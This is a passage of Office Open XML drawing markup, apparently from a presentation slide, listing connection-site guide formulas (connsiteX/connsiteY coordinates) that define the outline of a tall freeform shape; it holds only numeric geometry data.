              <a:gd name="connsiteY113" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY121" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY122" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY123" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY124" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY125" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY126" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY127" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY128" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY129" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY130" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY131" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 463337 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 449742 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 436211 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 429633 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 430964 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 435318 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 462415 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 462722 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 462749 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 461364 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 465190 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 493180 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 510743 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 473777 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 451254 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY121" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY122" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY123" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY124" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY125" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY126" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY127" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY128" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY129" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY130" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY131" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 463337 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 449742 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
